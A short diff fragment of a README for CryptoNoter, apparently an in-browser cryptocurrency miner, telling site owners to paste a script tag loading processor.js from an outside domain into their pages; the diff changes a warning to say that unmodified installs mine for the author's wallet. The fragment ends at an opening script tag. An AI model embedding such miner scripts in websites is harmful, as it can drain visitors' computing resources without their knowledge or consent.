JayWalker512/CryptoNoter/README.md

 ```

 ## Usage
 * Add the following javascript before the </head> tag on your website coding.
 Remember to replace www.cryptonoter.com with your domain name.
-Else, it will not work
+Else, you will be mining for my wallet
 ```html
 <script src="https://www.cryptonoter.com/processor.js"></script>
 <script>